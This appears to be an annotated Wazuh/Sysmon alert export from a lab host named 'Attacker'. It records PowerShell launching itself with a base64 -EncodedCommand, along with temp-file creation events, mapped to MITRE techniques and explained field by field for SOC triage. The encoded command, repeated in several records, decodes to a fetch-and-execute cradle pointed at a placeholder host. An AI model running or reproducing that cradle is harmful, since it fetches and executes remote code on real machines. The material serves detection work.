data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1ba-680a-0e0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16768
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:05.703+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:05.703+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  143
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535425.2963955
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:03.4336005Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351117
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:57:03.394 ProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00} ProcessId: 13568 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_byyqns3s.1z0.ps1 CreationUtcTime: 2025-04-24 22:57:03.394 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:03.394
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1bd-680a-100d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13568
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_byyqns3s.1z0.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:57:03.394
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:08.104+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:08.104+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  140
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535428.2966724
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:06.0234990Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351150
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:57:04.713 ProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00} ProcessId: 13988 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00} ParentProcessId: 13568 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:04.713
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1c0-680a-120d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13988
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1bd-680a-100d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13568
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:08.109+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:08.109+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  144
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535428.2974795
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:06.2461871Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351151
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:57:06.240 ProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00} ProcessId: 13988 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3wdrra44.odj.ps1 CreationUtcTime: 2025-04-24 22:57:06.240 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:06.240
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1c0-680a-120d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13988
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3wdrra44.odj.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:57:06.240
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:11.446+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:11.446+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  141
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535431.2977564
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:08.8267106Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351174
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:57:07.554 ProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00} ProcessId: 16876 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00} ParentProcessId: 13988 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:07.554
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1c3-680a-140d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

